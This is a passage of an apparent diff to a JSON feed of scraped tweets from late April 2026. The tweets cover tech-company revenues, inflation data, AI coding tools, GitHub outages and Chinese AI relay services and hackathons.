"title": "A÷你认真的吗,38分钟打满了😅", + "url": "https://x.com/Pluvio9yte/status/2049886136580137378", + "published_at": "2026-04-30T16:18:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27\n'00: 24\n'99: 22\n$MSFT", + "url": "https://x.com/charliebilello/status/2049882175433015544", + "published_at": "2026-04-30T16:02:50+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", + "url": "https://x.com/GoSailGlobal/status/2049881966850499058", + "published_at": "2026-04-30T16:02:00+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: One underdiscussed part of the Google-DOD deal is how it blindsided the company’s own employees.\n\nOne told @cogcelia that senior management had repeatedly insisted Google wouldn’t cave to the Pentagon’s demands — which proved not to be true.\n\nhttps://www.transformernews.ai/p/deepmind-employees-made-their-opposition", + "url": "https://x.com/GaryMarcus/status/2049881272990789710", + "published_at": "2026-04-30T15:59:15+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStack 包名被恶意抢注,NPM 拖了几年没处理,那个抢注包昨天被植入恶意代码,专偷 .env\n\n技术平台的信任有 4 层 \n(1)功能跟昨天一致吗 - 早就在崩 \n(2)现在能用吗 - 一半时间不能 \n(3)昨天合并的代码还在吗 - 这条线最近被跨过去了 \n(4)别人能偷走我的代码吗 - 这条也跨了 \n\nGitHub 一层一层全丢了\n\n最荒诞的部分在管理层 GitHub 现在没有 CEO \n\nCOO 和 CTO 直接向一个微软 Azure/AI 副总汇报 \n\n而那个副总,恰好是 Atlassian 董事会成员 (Atlassian 名下那个产品叫 Bitbucket)\n\n有没有更好的替代品,是这一个真的不能用了\n\nGitLab?Forgejo?Codeberg ?Bitbucket?", + "url": "https://x.com/GoSailGlobal/status/2049881037547999546", + "published_at": "2026-04-30T15:58:18+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$GOOGL", + "url": "https://x.com/charliebilello/status/2049880154629878151", + "published_at": "2026-04-30T15:54:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "The future of product design.", + "url": "https://x.com/dingyi/status/2049875727689146789", + "published_at": "2026-04-30T15:37:12+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "所以GPT的Plus和Team额度差多少", + "url": "https://x.com/realNyarime/status/2049874226778452072", + "published_at": "2026-04-30T15:31:15+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Big Tech’s $700 billion spending on AI this year is called the ‘greatest capital misallocation in history’ https://trib.al/qUQIbrJ", + "url": "https://x.com/GaryMarcus/status/2049874202983870910", + "published_at": "2026-04-30T15:31:09+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到成品」的距离,第一次被压进一个对话框里\n\n办公 AI 的最后一公里,被 Google 先抢了 全球免费已开,做出海 / AI 工具号 / 跨境内容的,下一波选题素材又有了 \n\n正在追这条线的更多动向,下一条接着拆怎么用", + "url": "https://x.com/GoSailGlobal/status/2049872749850665004", + "published_at": "2026-04-30T15:25:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", + "url": "https://x.com/CuiMao/status/2049863222195572817", + "published_at": "2026-04-30T14:47:31+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974126036…", + "url": "https://x.com/GoSailGlobal/status/2049862449474740224", + "published_at": "2026-04-30T14:44:27+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国制造”加速向“中国品牌”转型,更将在广州国际级CBD核心区——珠江新城加速一批跨境数智服务企业集聚,形成新的出海生态。", + "url": "https://x.com/realNyarime/status/2049857210659070441", + "published_at": "2026-04-30T14:23:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", + "url": "https://x.com/realNyarime/status/2049856990957236483", + "published_at": "2026-04-30T14:22:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", + "url": "https://x.com/HarryStebbings/status/2049852141334904978", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Meta\n- Thoma Bravo Hand Back Medallia Keys to Creditor\n\nI sat down with @rodriscoll and @jasonlk and my notes below:\n\n1. Why does Dario at Anthropic have such a hard job predicting the compute demands?\n\nThe capital intensity of building an AI leader is unprecedented; every $1 of run-rate revenue requires approximately $4 to $5 of CapEx to support it. A CEO must forecast demand two years in advance, which is incredibly risky. Underestimating demand leaves you with insufficient compute to serve users, while overestimating it results in billions of dollars in \"stranded capacity\".\n\n2. What the public markets are getting wrong about the SaaS-pocalypse\n\nThe market currently believes specific coding vibes or models are the primary threat, but the true danger is what AI agents decide to pick. Agents will ultimately choose the vendors and LLMs for most workflows, rendering tools like project management software useless because agents have no need for them. Companies like OpenAI are racing to win the \"agent wars\" to ensure their APIs are the default choice for these autonomous systems.\n\n3. Why Google is a mega-buy on the back of the Anthropic investment\n\nGoogle is positioned as a primary winner because it benefits whether users choose Gemini or Anthropic. They possess \"infinite capacity\" compared to other players, allowing them to route compute surplus between their own needs and their various customers. This massive cash flow and infrastructure flexibility make them a \"win-win-win\" in the current AI arms race.\n\n4. Multi-year contracts don't matter. Deferred churn is still churn.\n\nMulti-year contracts are often a place where \"mediocre\" management hides to mask underlying business problems. While a customer might be locked into an eight-year cycle through standard upfront terms and renewals, they are essentially just taking that time to find a better enterprise solution. If a customer eventually leaves, the churn was merely deferred, and the terminal value of the company remains impacted.\n\n5. What happens to the distributions from Manus? Do the investors have to give the money back?\n\nWhen a regulatory body like China attempts to \"unwind\" an acquisition like Meta's purchase of Manus, there is a near-zero chance that venture investors will return the capital already distributed. The real pressure point is on the acquiring corporation and the technology itself, rather than the VC funds. Such rulings are primarily designed to prevent similar deals from occurring in the future.\n\n6. The two great wars that no one is talking about\n\nTwo subtle but massive \"battles\" are currently unfolding: the US vs. China AI war and the resulting social dislocation. We are seeing a rise in \"social unrest\" expressed through billionaire taxes and penthouses taxes as layoffs from AI automation begin to impact the workforce. These themes of geopolitical competition and internal inequality will be the defining political stories of the decade.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2049852139690754293", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "Jerome Powell held 63 press conference as Fed chairman and over that time there wasn't a single question about the 40% money supply spike in 2020-21 or $18 trillion increase in the national debt during his tenure as the root causes of inflation.\n\nThat's either unbelievable incompetence on the part of the most renowned financial journalists in the business or questioning/dissent is not allowed.\n\nWhich is it?", + "url": "https://x.com/charliebilello/status/2049845442842603574", + "published_at": "2026-04-30T13:36:52+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", + "url": "https://x.com/Pluvio9yte/status/2049845097924342258", + "published_at": "2026-04-30T13:35:30+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", + "url": "https://x.com/GoSailGlobal/status/2049842340056174762", + "published_at": "2026-04-30T13:24:32+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", + "url": "https://x.com/charliebilello/status/2049842225970852313", + "published_at": "2026-04-30T13:24:05+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", + "url": "https://x.com/realNyarime/status/2049839485610029262", + "published_at": "2026-04-30T13:13:12+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong case for a rate hike.", + "url": "https://x.com/charliebilello/status/2049838235866566668", + "published_at": "2026-04-30T13:08:14+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Remember this the next time you find yourself in a turbulent market with bad news:\n1. You are a long-term investor\n2. Diversified portfolios are resilient\n3. Down markets present opportunities\n4. Corrections and bear markets have always given way to a recovery", + "url": "https://x.com/charliebilello/status/2049836667650089194", + "published_at": "2026-04-30T13:02:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2049836652181307421", + "published_at": "2026-04-30T13:01:56+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这篇文章说了很多小团队的协作经验\n\n文里提到的一些模式我也深有体会。\n\n曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。\n\n最后也是因为超预期在分钱上出了问题。\n\n不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。", + "url": "https://x.com/Pluvio9yte/status/2049836555171512759", + "published_at": "2026-04-30T13:01:33+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "孜然牛肉盖饭 4u", + "url": "https://x.com/0xAA_Science/status/2049832988452778343", + "published_at": "2026-04-30T12:47:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。", + "url": "https://x.com/CuiMao/status/2049832524067794961", + "published_at": "2026-04-30T12:45:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款\n主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知\n\n借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失", + "url": "https://x.com/realNyarime/status/2049831528109326356", + "published_at": "2026-04-30T12:41:34+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei", + "url": "https://x.com/CuiMao/status/2049828401201246395", + "published_at": "2026-04-30T12:29:09+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。\n\n既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。", + "url": "https://x.com/Pluvio9yte/status/2049822206885286318", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204977806829…", + "url": "https://x.com/Pluvio9yte/status/2049821305072124254", + "published_at": "2026-04-30T12:00:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto's current state is a bit shit\n\n1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable \n\n2. The long tail speculative stuff went from high risk high reward to 'some dude in Miami is going to zero this if you hold it for more than 5.9 seconds'\n\n3. Everything is extremely correlated and you can't meaningfully make bets based on sectors as it all converges into a tightly correlated mush, especially to the downside\n\n4. Broad brush alt season is an artefact of the past that's very hard to replicate given (2) and given that there are simply too many coins and the excess of speculation doesn't really happen on centralised exchanges anymore - it's been siphoned off to bundled shit in max PvP settings\n\n5. Crypto reputationally is no longer the sexy frontier of speculation. Institutional bid is in AI, retail speculative bid is in 0DTE equities, single name stocks etc.\n\n6. Convexity has flattened. Even a lot of the historically safe blue chip stuff (BTC, ETH etc.) has underperformed and the historical anchor of 'buy deep drawdowns because all-time highs are guaranteed and explosive' has disappointed. All the shit we used to put up with because of the accessibly massive trend and momentum effects is now harder to justify because those same effects are getting neutered or siphoned off into other arenas.\n\nThe obvious rebuttal is 'cycles' but even this past cycle is a useful counterpoint: it was extremely concentrated versus broad brush wealth effect, plus something very obviously broke after 10/10.\n\nSo what does this all mean?\n\n1. In previous cycles, nailing timing was enough and selection was the cherry on top (rising tide lifted all boats). I don't think that holds - both timing and selection matter now and in the future.\n\n2. Participation alone can be an edge if the asset class is early enough and/or mispriced enough. I don't think that holds either, and we might actually have to learn how to trade (fuck).\n\n3. Hopefully I'm an idiot doomposting the bottom\n\nGM", + "url": "https://x.com/CryptoCred/status/2049820412754694460", + "published_at": "2026-04-30T11:57:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: github.com/runesleo/claude-v…", + "url": "https://x.com/runes_leo/status/2049811948653752753", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "开源视频管线 claude-video-kit 升级\n\n比上一版多了:\n\n· 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的)\n· Remotion / ffmpeg 版本锁定 + 音频标准化配方\n· 声纹 ref 改环境变量\n· v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双卡片对比)\n\n仓库链接见评论区👇", + "url": "https://x.com/runes_leo/status/2049811945528893682", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱:\n\n▶️demo: https://aidemos.atmeta.com/tribev2/ \n📄paper: https://ai.meta.com/research/publications/a-foundation-model-of-vision-audition-and-language-for-in-silico-neuroscience/\n💻code: https://github.com/facebookresearch/tribev2", + "url": "https://x.com/ylecun/status/2049806660001022372", + "published_at": "2026-04-30T11:02:45+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Claude code 对 OpenClaw的封杀已经丧心病狂了\n\n最近,Theo(32 万粉的硅谷科技 YouTuber) 发现:\n\n如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费\n\n现在Anthropic已经疯狂在毁开发者好感了\n\n这种表里不一不是第一次了哈\n\n之前 Claude Code 负责人 Boris Cherny,在推特上公开承诺过:CLI 调用是不会被封了\n\nOpenClaw 作者 Steinberger 信了,还专门给 OpenClaw 改了默认配置\n\n现在他还在HK抱怨:Anthropic 后台还在封 OpenClaw 的 system prompt。\n\n真的是朴实无华的商战!!", + "url": "https://x.com/lxfater/status/2049796253471453564", + "published_at": "2026-04-30T10:21:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Warp 开源那天我没换。\n\n为啥?看了眼 license 直接乐了。\n\nrepo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。\n\nAGPL 就是那个专门防 AWS 白嫖的协议。\n\n你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——AWS 一般就放弃了。\n\nMongoDB 当年觉得 AGPL 还不够狠,自己发明了更绝的 SSPL。结果 AWS 干脆绕开 MongoDB 自己 fork 一个改名 DocumentDB。但 MongoDB 守住了自己的市场。\n\nWarp 这次抄的就是这套作业。\n\n更骚的是 OpenAI 掺一脚做 founding sponsor,README 写得明白,\"agentic workflows powered by GPT models\"。\n\n合起来啥意思?\n\nWarp 把\"终端\"这层免费送,让所有人习惯在终端里调 AI。AGPL 防住大厂二次包装。OpenAI 在更上游收 API 的钱。顺手把 Cursor 那种\"卖 $20/月 AI 编辑器订阅\"的活路一并端了——免费给你 AI 终端 + GPT 模型,凭啥继续付 Cursor?\n\n闭源真的卖不动了。开源是逼出来的。\n\n---\n\nAI dev tool 现在四种活法:\n\n- Cursor:闭源卖订阅,VC 续命,Warp 这种免费替代品出来后越来越难\n- Claude Code:闭源,但钱不在终端层,在 Anthropic API 层收\n- Warp:开源 + AGPL 防御,让 OpenAI 出钱\n- Aider:Apache 真开源,比 Cursor 早 2 年的开源 AI pair programming CLI,一个开发者维护,没商业野心\n\n共同信号一句话:纯卖软件订阅在这层快走死了。\n\n---\n\n我自己用 Ghostty + Claude Code / Codex。\n\n终端只做终端,AI 在 agent 层。\n\nWarp 把两件事捏一起,对我冗余。它解决的痛点我没有。", + "url": "https://x.com/runes_leo/status/2049791371364479224", + "published_at": "2026-04-30T10:02:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "View of Stockholm.", + "url": "https://x.com/paulg/status/2049788518730240192", + "published_at": "2026-04-30T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象", + "url": "https://x.com/dingyi/status/2049787450290287014", + "published_at": "2026-04-30T09:46:26+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "欢迎大家来参加由http://dragoncode.codes举办的小黑客松\n\nDragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动!\n\n主题不难,围绕能够提效的小工具Vibe Coding即可\n\n奖励:\n🥇510元x1\n🥈150元x2\n🎁51 Dragon Code x15\n\n参与方式见引用帖子:进群->填表>提交作品", + "url": "https://x.com/Pluvio9yte/status/2049786034502967620", + "published_at": "2026-04-30T09:40:48+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说一下我是如何用AI工具的:\n\nXai的Gork的搜索能力很强的,我经常使用来做搜索。\n\nCluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。\n\n而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。", + "url": "https://x.com/lxfater/status/2049782414323388714", + "published_at": "2026-04-30T09:26:25+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "你这个朋友我认识", + "url": "https://x.com/CuiMao/status/2049778271714496808", + "published_at": "2026-04-30T09:09:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "今天去咖啡厅办公 \n\n旁边桌疑似图拉鼎老哥@tualatrix ,临走前,厚着脸皮去问了下\n\n哈哈😄 加上了图拉鼎老哥,聊了好久", + "url": "https://x.com/GoSailGlobal/status/2049776902689153297", + "published_at": "2026-04-30T09:04:31+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. \n\nThe job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the running. \n\nTack. Ha det fint! 🇸🇪", + "url": "https://x.com/paulg/status/2049771206283313434", + "published_at": "2026-04-30T08:41:53+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Pinned: 五一做点不一样的。\n\n我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇\n\n主题很简单:\n用 AI 解决一个每天浪费 10 分钟的小问题\n\n不用炫技,不用大项目\n能用、有效、有感觉就行\n\n3 个赛道:\n\n赛道一:省时间\n把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。\n\n赛道二:省脑力\n帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评论分析、知识整理。\n\n赛道三:帮身边人\n解决具体生活或工作问题,比如:说明书问答、账单整理、小商家工具、旅行助手、宠物照护提醒。\n\n时间:\n提交时间:4月30日 - 5月4日\n评审时间:5月5日\n结果公布:5月5日\n\n奖励:\n\n🥇 510 元 ×1\n🥈 150 元 ×2\n🎁 51 Dragon Code ×15\n\n要求很低:\n\n有 Demo(哪怕只是个能跑的)\n用了 AI(生成 / 摘要 / Agent 都行)\n能说明前后变化(比如省了多少时间)\n\n评分看这 5 点:\n\n痛点是否真实\n效果是否明显\nDemo 是否跑通\nAI 用得对不对\n有没有产品感\n\n参与方式:\n\n进群 → 填表 → 提交作品\n\n一句话:\n\n做一个你自己都想每天用的小工具", + "url": "https://x.com/bozhou_ai/status/2049770737175789619", + "published_at": "2026-04-30T08:40:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "下载NVIDIA App,领取《鸣潮》游戏礼包\n\n包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。\n\n数量有限,兑完即止。(本活动仅适用于中国大陆用户)\n本活动将于 2026 年 6 月 10 日结束。", + "url": "https://x.com/realNyarime/status/2049765382433755229", + "published_at": "2026-04-30T08:18:44+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "R to @Pluvio9yte: 帖子没了 可以去问grok GPT有什么促销活动", + "url": "https://x.com/Pluvio9yte/status/2049764309144879198", + "published_at": "2026-04-30T08:14:28+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "深飘新工作:AI账号订阅工程师\n寻找负责批量化开通低价渠道的,维护稳定性和可用性,需要有经验的!!", + "url": "https://x.com/realNyarime/status/2049754484071629206", + "published_at": "2026-04-30T07:35:26+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "嘿嘿,有意思", + "url": "https://x.com/lxfater/status/2049754205641170992", + "published_at": "2026-04-30T07:34:19+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 完整版(英文 / 3 小时干货):\nhttps://www.youtube.com/watch?v=7xTGNNLPyMI\n\n强烈建议看完整版。", + "url": "https://x.com/runes_leo/status/2049745624703320340", + "published_at": "2026-04-30T07:00:14+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 刚实测,第一反应仍然是「9.11 更大」,靠把 9.9 写成 9.90 这一步才把自己绕回来。😂", + "url": "https://x.com/runes_leo/status/2049745621159145603", + "published_at": "2026-04-30T07:00:13+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "ChatGPT 能解 PhD 物理题,9.11 比 9.9 这道小学数学题,第一反应还是会答错。\n\n不是它笨,是它根本看不见这串字符。\n\nKarpathy 三小时讲 LLM 的新视频里专门讲了原因——做了个 60 秒解读 👇", + "url": "https://x.com/runes_leo/status/2049745599105572981", + "published_at": "2026-04-30T07:00:07+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: These folks are trying to ban open source. \n\nThey're looking to take away your freedom to choose.\n\nThey're also looking to take away the rights of businesses like Cursor to fine tune and make their product faster and cheaper.\n\nThey must be stopped.\n\nTheir premise is pretty simple \"China = bad.\"\n\nThat's it. There is no other technical reason at all. Zero. None.\n\nThere is no reason or evidence for this probe. If these models are running on American hardware in American datacenters fine tuned by American companies then there is no ground for them to stand on other than fake \"Manchurian candidate\" nonsense (aka the model might be trained to do something nefarious but you won't know, like exfiltrate your data secretly, Muhahahahah.). This is absurd at every level. \n\nIt coveys a complete lack of basic IT understanding.\n\nAs if professional IT admins would not notice network traffic to a random IP address through just basic networking logging and users would not notice anything weird in its outputs or thought patterns.\n\nThere is no ground to stand on. \n\nIt's just a push to take away your rights and freedoms and to take away the rights of businesses.\n\nDon't stand for it.\n\n(Article in links)", + "url": "https://x.com/ylecun/status/2049745165665853742", + "published_at": "2026-04-30T06:58:24+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": 